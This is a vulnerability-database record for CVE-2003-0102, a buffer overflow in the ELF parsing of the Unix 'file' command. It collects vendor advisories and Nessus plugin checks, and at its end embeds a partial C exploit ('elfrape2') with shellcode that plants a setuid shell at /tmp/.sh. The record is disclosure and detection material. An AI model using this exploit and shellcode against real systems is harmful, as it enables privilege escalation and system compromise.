ID: SUSE-SA:2003:017
Type: suse
Reporter: Suse
Modified: 2003-03-21T12:40:17
Description
The file command can be used to determine the type of files. iDEFENSE published a security report about a buffer overflow in the handling routines for the ELF file format. In conjunction with other mechanisms such as print filters, cron jobs, e-mail scanners (like AMaViS) and the like, this vulnerability can be used to gain higher privileges or to compromise the system remotely.
{"enchantments": {"score": {"value": 6.0, "vector": "NONE", "modified": "2016-09-04T11:50:35"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2003-0102"]}, {"type": "osvdb", "idList": ["OSVDB:6456"]}, {"type": "redhat", "idList": ["RHSA-2003:087"]}, {"type": "nessus", "idList": ["MANDRAKE_MDKSA-2003-030.NASL", "REDHAT-RHSA-2003-087.NASL", "DEBIAN_DSA-260.NASL", "SUSE_SA_2003_017.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:22325", "EDB-ID:22324"]}, {"type": "openvas", "idList": ["OPENVAS:53591"]}, {"type": "debian", "idList": ["DEBIAN:DSA-260-1:4057C"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:4165"]}], "modified": "2016-09-04T11:50:35"}, "vulnersScore": 6.0}, "reporter": "Suse", "id": "SUSE-SA:2003:017", "modified": "2003-03-21T12:40:17", "published": "2003-03-21T12:40:17", "history": [], "bulletinFamily": "unix", "viewCount": 1, "cvelist": ["CVE-2003-0102"], "affectedPackage": [{"packageVersion": "3.37-206", "packageName": "file", "packageFilename": "file-3.37-206.i386.rpm", "operator": "lt", "OSVersion": "8.0", "OS": "openSUSE", "arch": "i386"}, {"packageVersion": "3.33-69", "packageName": "file", "packageFilename": "file-3.33-69.ppc.rpm", "operator": "lt", "OSVersion": "7.3", "OS": "openSUSE", "arch": "ppc"}, {"packageVersion": "3.32-118", "packageName": "file", "packageFilename": "file-3.32-118.i386.rpm", "operator": "lt", "OSVersion": "7.1", "OS": "openSUSE", "arch": "i386"}, {"packageVersion": "3.32-36", "packageName": "file", "packageFilename": "file-3.32-36.ppc.rpm", "operator": "lt", "OSVersion": "7.1", "OS": "openSUSE", "arch": "ppc"}, {"packageVersion": "3.37-206", "packageName": "file", "packageFilename": "file-3.37-206.i586.rpm", "operator": "lt", "OSVersion": "8.1", "OS": "openSUSE", "arch": "i586"}, {"packageVersion": "3.32-69", "packageName": "file", "packageFilename": "file-3.32-69.alpha.rpm", "operator": "lt", "OSVersion": "7.1", "OS": "openSUSE", "arch": "alpha"}, {"packageVersion": "3.33-39", 
"packageName": "file", "packageFilename": "file-3.33-39.sparc.rpm", "operator": "lt", "OSVersion": "7.3", "OS": "openSUSE", "arch": "sparc"}, {"packageVersion": "3.33-85", "packageName": "file", "packageFilename": "file-3.33-85.i386.rpm", "operator": "lt", "OSVersion": "7.3", "OS": "openSUSE", "arch": "i386"}], "type": "suse", "hash": "55ec6031be75e0f08fa2aa2514d0931ceff6e554934e31db6d729006017fe162", "references": [], "description": "The file command can be used to determine the type of files. iDEFENSE published a security report about a buffer overflow in the handling-routines for the ELF file-format. In conjunction with other mechanisms like print-filters, cron-jobs, eMail-scanners (like AMaViS) and alike this vulnerability can be used to gain higher privileges or to compromise the system remotely.", "title": "remote system compromise in file", "href": "http://lists.opensuse.org/opensuse-security-announce/2003-03/msg00018.html", "lastseen": "2016-09-04T11:50:35", "edition": 1, "objectVersion": "1.2", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}
{"cve": [{"lastseen": "2019-05-29T18:07:57", "bulletinFamily": "NVD", "description": "Buffer overflow in tryelf() in readelf.c of the file command allows attackers to execute arbitrary code as the user running file, possibly via a large entity size value in an ELF header (elfhdr.e_shentsize).", "modified": "2018-05-03T01:29:00", "id": "CVE-2003-0102", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0102", "published": "2003-03-18T05:00:00", "title": "CVE-2003-0102", "type": "cve", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:01", "bulletinFamily": "software", "description": "# No description provided by the source\n\n## References:\n[Vendor Specific Advisory URL](ftp://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2003-003.txt.asc)\nRedHat RHSA: RHSA-2003:086\nMail List Post: http://marc.theaimsgroup.com/?l=bugtraq&m=104680706201721&w=2\n[CVE-2003-0102](https://vulners.com/cve/CVE-2003-0102)\n", "modified": "2003-03-04T00:00:00", "published": "2003-03-04T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:6456", "id": "OSVDB:6456", "type": "osvdb", "title": "file Command readelf.c tryelf() ELF Header Overflow", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "redhat": [{"lastseen": "2019-08-13T18:44:40", "bulletinFamily": "unix", "description": "The file command is used to identify a particular file according to\nthe type of data contained by the file.\n\nThe file utility before version 3.41 contains a buffer overflow\nvulnerability in the ELF parsing routines. 
This vulnerability may\nallow an attacker to create a carefully crafted binary which can cause\narbitrary code to run if a victim runs the file command against that\nbinary.\n\nOn some distributions it may also be possible to trigger this file command\nvulnerability by encouraging the victim to use the\nless command on an exploited file name so that it will be processed by the\nlesspipe.sh script.\n\nAll users are advised to update to these erratum packages which\ncontain a backported patch to correct this vulnerability.\n\nRed Hat would like to thank iDefense for disclosing this issue and\nzen-parse for discussion of some of the implications.", "modified": "2018-03-14T19:26:39", "published": "2003-03-05T05:00:00", "id": "RHSA-2003:087", "href": "https://access.redhat.com/errata/RHSA-2003:087", "type": "redhat", "title": "(RHSA-2003:087) file security update", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2019-11-01T03:20:08", "bulletinFamily": "scanner", "description": "Updated file packages are available to close a buffer overflow\nvulnerability.\n\n[Updated 12 March 2003] Added packages for Red Hat Enterprise Linux ES\nand Red Hat Enterprise Linux WS\n\nThe file command is used to identify a particular file according to\nthe type of data contained by the file.\n\nThe file utility before version 3.41 contains a buffer overflow\nvulnerability in the ELF parsing routines. 
This vulnerability may\nallow an attacker to create a carefully crafted binary which can cause\narbitrary code to run if a victim runs the file command against that\nbinary.\n\nOn some distributions it may also be possible to trigger this file\ncommand vulnerability by encouraging the victim to use the less\ncommand on an exploited file name so that it will be processed by the\nlesspipe.sh script.\n\nAll users are advised to update to these erratum packages which\ncontain a backported patch to correct this vulnerability.\n\nRed Hat would like to thank iDefense for disclosing this issue and\nzen-parse for discussion of some of the implications.", "modified": "2019-11-02T00:00:00", "id": "REDHAT-RHSA-2003-087.NASL", "href": "https://www.tenable.com/plugins/nessus/12376", "published": "2004-07-06T00:00:00", "title": "RHEL 2.1 : file (RHSA-2003:087)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2003:087. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(12376);\n script_version (\"1.24\");\n script_cvs_date(\"Date: 2019/10/25 13:36:10\");\n\n script_cve_id(\"CVE-2003-0102\");\n script_xref(name:\"RHSA\", value:\"2003:087\");\n\n script_name(english:\"RHEL 2.1 : file (RHSA-2003:087)\");\n script_summary(english:\"Checks the rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated file packages are available to close a buffer overflow\nvulnerability.\n\n[Updated 12 March 2003] Added packages for Red Hat Enterprise Linux ES\nand Red Hat Enterprise Linux WS\n\nThe file command is used to identify a particular file according to\nthe type of data contained by the file.\n\nThe file utility before version 3.41 contains a buffer overflow\nvulnerability in the ELF parsing routines. 
This vulnerability may\nallow an attacker to create a carefully crafted binary which can cause\narbitrary code to run if a victim runs the file command against that\nbinary.\n\nOn some distributions it may also be possible to trigger this file\ncommand vulnerability by encouraging the victim to use the less\ncommand on an exploited file name so that it will be processed by the\nlesspipe.sh script.\n\nAll users are advised to update to these erratum packages which\ncontain a backported patch to correct this vulnerability.\n\nRed Hat would like to thank iDefense for disclosing this issue and\nzen-parse for discussion of some of the implications.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2003-0102\"\n );\n # http://www.idefense.com/advisory/03.04.03.txt\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.accenture.com/us-en/service-idefense-security-intelligence\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2003:087\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected file package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:file\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:2.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2003/03/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2003/03/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/07/06\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^2\\.1([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 2.1\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\nif (cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i386\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2003:087\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"file-3.39-8.7x\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + 
redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"file\");\n }\n}\n", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-01T02:54:55", "bulletinFamily": "scanner", "description": "A memory allocation problem in file was found by Jeff Johnson, and a\nstack overflow corruption problem was found by David Endler. These\nproblems have been corrected in file version 3.41 and likely affect\nall previous version. These problems pose a security threat as they\ncan be used to execute arbitrary code by an attacker under the\nprivileges of another user. Note that the attacker must first somehow\nconvince the target user to execute file against a specially crafted\nfile that triggers the buffer overflow in file.\n\nUpdate :\n\nThe 8.2 and 9.0 packages installed data in a different directory than\nwhere they should have been installed, which broke compatability with\na small number of programs. These updated packages place those files\nback in the appropriate location.", "modified": "2019-11-02T00:00:00", "id": "MANDRAKE_MDKSA-2003-030.NASL", "href": "https://www.tenable.com/plugins/nessus/14014", "published": "2004-07-31T00:00:00", "title": "Mandrake Linux Security Advisory : file (MDKSA-2003:030-1)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandrake Linux Security Advisory MDKSA-2003:030. 
\n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(14014);\n script_version (\"1.17\");\n script_cvs_date(\"Date: 2019/08/02 13:32:46\");\n\n script_cve_id(\"CVE-2003-0102\");\n script_xref(name:\"MDKSA\", value:\"2003:030-1\");\n\n script_name(english:\"Mandrake Linux Security Advisory : file (MDKSA-2003:030-1)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Mandrake Linux host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A memory allocation problem in file was found by Jeff Johnson, and a\nstack overflow corruption problem was found by David Endler. These\nproblems have been corrected in file version 3.41 and likely affect\nall previous version. These problems pose a security threat as they\ncan be used to execute arbitrary code by an attacker under the\nprivileges of another user. Note that the attacker must first somehow\nconvince the target user to execute file against a specially crafted\nfile that triggers the buffer overflow in file.\n\nUpdate :\n\nThe 8.2 and 9.0 packages installed data in a different directory than\nwhere they should have been installed, which broke compatability with\na small number of programs. 
These updated packages place those files\nback in the appropriate location.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.idefense.com/advisory/03.04.03.txt\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected file package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:file\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:8.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:9.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2003/04/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/07/31\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2019 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK8.2\", cpu:\"i386\", reference:\"file-3.41-1.2mdk\", yank:\"mdk\")) flag++;\n\nif 
(rpm_check(release:\"MDK9.0\", cpu:\"i386\", reference:\"file-3.41-1.2mdk\", yank:\"mdk\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-01T02:21:13", "bulletinFamily": "scanner", "description": "iDEFENSE discovered a buffer overflow vulnerability in the ELF format\nparsing of the ", "modified": "2019-11-02T00:00:00", "id": "DEBIAN_DSA-260.NASL", "href": "https://www.tenable.com/plugins/nessus/15097", "published": "2004-09-29T00:00:00", "title": "Debian DSA-260-1 : file - buffer overflow", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-260. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(15097);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2019/08/02 13:32:17\");\n\n script_cve_id(\"CVE-2003-0102\");\n script_xref(name:\"DSA\", value:\"260\");\n\n script_name(english:\"Debian DSA-260-1 : file - buffer overflow\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"iDEFENSE discovered a buffer overflow vulnerability in the ELF format\nparsing of the 'file' command, one which can be used to execute\narbitrary code with the privileges of the user running the command.\nThe vulnerability can be exploited by crafting a special ELF binary\nwhich is then input to file. 
This could be accomplished by leaving the\nbinary on the file system and waiting for someone to use file to\nidentify it, or by passing it to a service that uses file to classify\ninput. (For example, some printer filters run file to determine how to\nprocess input going to a printer.)\n\nFixed packages are available in version 3.28-1.potato.1 for Debian 2.2\n(potato) and version 3.37-3.1.woody.1 for Debian 3.0 (woody). We\nrecommend you upgrade your file package immediately.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2003/dsa-260\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected file package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:file\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:2.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2003/03/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/09/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2019 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif 
(deb_check(release:\"2.2\", prefix:\"file\", reference:\"3.28-1.potato.1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"file\", reference:\"3.37-3.1.woody.1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-03T12:18:09", "bulletinFamily": "scanner", "description": "The remote host is missing the patch for the advisory SUSE-SA:2003:017 (file).\n\n\nThe file command can be used to determine the type of files.\niDEFENSE published a security report about a buffer overflow in the\nhandling-routines for the ELF file-format.\nIn conjunction with other mechanisms like print-filters, cron-jobs,\neMail-scanners (like AMaViS) and alike this vulnerability can be used\nto gain higher privileges or to compromise the system remotely.\n\nThere is no temporary fix known other then updating the system.\n\nPlease download the update package for your distribution and verify its\nintegrity by the methods listed in section 3) of this announcement.\nThen, install the package using the command ", "modified": "2019-11-02T00:00:00", "id": "SUSE_SA_2003_017.NASL", "href": "https://www.tenable.com/plugins/nessus/13787", "published": "2004-07-25T00:00:00", "title": "SUSE-SA:2003:017: file", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# This plugin text was extracted from SuSE Security Advisory SUSE-SA:2003:017\n#\n\n\nif ( ! 
defined_func(\"bn_random\") ) exit(0);\n\ninclude(\"compat.inc\");\n\nif(description)\n{\n script_id(13787);\n script_bugtraq_id(7008);\n script_bugtraq_id(7009);\n script_version (\"1.22\");\n \n name[\"english\"] = \"SUSE-SA:2003:017: file\";\n \n script_name(english:name[\"english\"]);\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a vendor-supplied security patch\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is missing the patch for the advisory SUSE-SA:2003:017 (file).\n\n\nThe file command can be used to determine the type of files.\niDEFENSE published a security report about a buffer overflow in the\nhandling-routines for the ELF file-format.\nIn conjunction with other mechanisms like print-filters, cron-jobs,\neMail-scanners (like AMaViS) and alike this vulnerability can be used\nto gain higher privileges or to compromise the system remotely.\n\nThere is no temporary fix known other then updating the system.\n\nPlease download the update package for your distribution and verify its\nintegrity by the methods listed in section 3) of this announcement.\nThen, install the package using the command 'rpm -Fhv file.rpm' to apply\nthe update.\" );\n script_set_attribute(attribute:\"solution\", value:\n\"http://www.suse.de/security/2003_017_file.html\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2004/07/25\");\n script_cvs_date(\"Date: 2019/10/25 13:36:27\");\n script_end_attributes();\n\n \n summary[\"english\"] = \"Check for the version of the file package\";\n script_cve_id(\"CVE-2003-0102\", \"CVE-2003-1092\");\n script_summary(english:summary[\"english\"]);\n \n 
script_category(ACT_GATHER_INFO);\n \n script_copyright(english:\"This script is Copyright (C) 2004-2019 Tenable Network Security, Inc.\");\n family[\"english\"] = \"SuSE Local Security Checks\";\n script_family(english:family[\"english\"]);\n \n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/SuSE/rpm-list\");\n exit(0);\n}\n\ninclude(\"rpm.inc\");\nif ( rpm_check( reference:\"file-3.32-118\", release:\"SUSE7.1\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"file-3.33-85\", release:\"SUSE7.3\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"file-3.37-206\", release:\"SUSE8.0\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"file-3.37-206\", release:\"SUSE8.1\") )\n{\n security_hole(0);\n exit(0);\n}\nif (rpm_exists(rpm:\"file-\", release:\"SUSE7.1\")\n || rpm_exists(rpm:\"file-\", release:\"SUSE7.3\")\n || rpm_exists(rpm:\"file-\", release:\"SUSE8.0\")\n || rpm_exists(rpm:\"file-\", release:\"SUSE8.1\") )\n{\n set_kb_item(name:\"CVE-2003-0102\", value:TRUE);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-02-02T18:29:18", "bulletinFamily": "exploit", "description": "File 3.x Local Stack Overflow Code Execution Vulnerability (2). CVE-2003-0102. Local exploit for unix platform", "modified": "2003-03-04T00:00:00", "published": "2003-03-04T00:00:00", "id": "EDB-ID:22325", "href": "https://www.exploit-db.com/exploits/22325/", "type": "exploitdb", "title": "File 3.x - Local Stack Overflow Code Execution Vulnerability 2", "sourceData": "source: http://www.securityfocus.com/bid/7008/info\r\n \r\nIt has been reported that a stack overflow exists in the file program. Although details of this issue are currently unavailable, it is likely that this issue could be exploited to execute code as the user invoking file. 
\r\n\r\n/*\r\n** file(1) exploit for *bsd,linux\r\n** does cp /bin/sh /tmp/.sh;chmod 4755 /tmp/.sh and also\r\n** echos the correct filename followed by \": data\"\r\n** this one actually works w/o silly targets or offsets\r\n** cmdshellcode by *://lsd-pl.net/\r\n** lem0nxx@hotmail.com\r\n*/\r\n#include <stdio.h>\r\n#include <string.h>\r\n#include <fcntl.h>\r\n#include <sys/types.h>\r\n#include <errno.h>\r\n/* elf stuff */\r\n#define EI_NIDENT 16\r\n#define ET_EXEC 2\r\n#define EM_VPP500 17/* Fujitsu VPP500! */\r\n#define EV_CURRENT 1\r\n#define FILESIZE 16384\r\ntypedef unsigned short int Elf32_Half;\r\ntypedef unsigned long int Elf32_Word;\r\ntypedef unsigned long int Elf32_Addr;\r\ntypedef unsigned long int Elf32_Off;\r\ntypedef struct\r\n{\r\n unsigned char e_ident[EI_NIDENT];\r\n Elf32_Half e_type;\r\n Elf32_Half e_machine;\r\n Elf32_Word e_version;\r\n Elf32_Addr e_entry;\r\n Elf32_Off e_phoff;\r\n Elf32_Off e_shoff;\r\n Elf32_Word e_flags;\r\n Elf32_Half e_ehsize;\r\n Elf32_Half e_phentsize;\r\n Elf32_Half e_phnum;\r\n Elf32_Half e_shentsize;\r\n Elf32_Half e_shnum;\r\n Elf32_Half e_shtrndx;\r\n}\r\nElf32_Ehdr;\r\nunsigned long\r\nget_sp (void)\r\n{\r\n __asm__ (\"movl %esp,%eax\");\r\n}\r\nunsigned char linux_code[] =\r\n \"\\xeb\\x22\\x59\\x31\\xc0\\x50\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\"\r\n \"\\xe3\\x50\\x66\\x68\\x2d\\x63\\x89\\xe7\\x50\\x51\\x57\\x53\\x89\\xe1\\x99\\xb0\\x0b\"\r\n \"\\xcd\\x80\\xe8\\xd9\\xff\\xff\\xff\";\r\nunsigned char bsd_code[] =\r\n \"\\xeb\\x25\\x59\\x31\\xc0\\x50\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\"\r\n \"\\xe3\\x50\\x66\\x68\\x2d\\x63\\x89\\xe7\\x50\\x51\\x57\\x53\\x89\\xe7\\x50\\x57\\x53\"\r\n \"\\x50\\xb0\\x3b\\xcd\\x80\\xe8\\xd6\\xff\\xff\\xff\";\r\nunsigned char cmd[] =\r\n \"echo %s: data;/bin/cp /bin/%s /tmp/.sh;chmod 4755 /tmp/.sh\";\r\nunsigned char *prepare_code (unsigned char *os_code, unsigned char *filename,\r\n unsigned char *shell, int *code_len);\r\nint\r\nmain (int argc, 
char *argv[])\r\n{\r\n unsigned char *final_code, *os_code, *shell, *attackbuff;\r\n int fd, ix, code_len;\r\n Elf32_Ehdr *ehdr;\r\n if (!(attackbuff = (char *) malloc (FILESIZE)))\r\n {\r\n fprintf (stderr, \"malloc error\\n\");\r\n exit (-1);\r\n }\r\n ehdr = (Elf32_Ehdr *) attackbuff;\r\n if (argc < 3)\r\n {\r\n fprintf (stderr, \"Usage: %s <filename> <bsd|linux>\\n\", argv[0]);\r\n exit (-1);\r\n }\r\n switch (argv[2][0])\r\n {\r\n case 'l':\r\n case 'L':\r\n os_code = linux_code;\r\n if (!(shell = strdup (\"ash\")))\r\n{\r\n fprintf (stderr, \"strdup error\\n\");\r\n exit (-1);\r\n}\r\n break;\r\n case 'b':\r\n case 'B':\r\n os_code = bsd_code;\r\n if (!(shell = strdup (\"tcsh\")))/* does tcsh drop privs tho? ah well */\r\n{\r\n fprintf (stderr, \"strdup error\\n\");\r\n exit (-1);\r\n}\r\n break;\r\n default:\r\n fprintf (stderr, \"Invalid target os\\n\");\r\n exit (-1);\r\n }\r\n fprintf (stderr,\r\n \"elfrape2, using cp /bin/%s /tmp/.sh;chmod 4755 /tmp/.sh shellcode\\n\",\r\n shell);\r\n final_code = prepare_code (os_code, argv[1], shell, &code_len);\r\n fprintf (stderr, \"Using %s shellcode, %d bytes for file %s\\n\",\r\n argv[2][0] == 'b' ? 
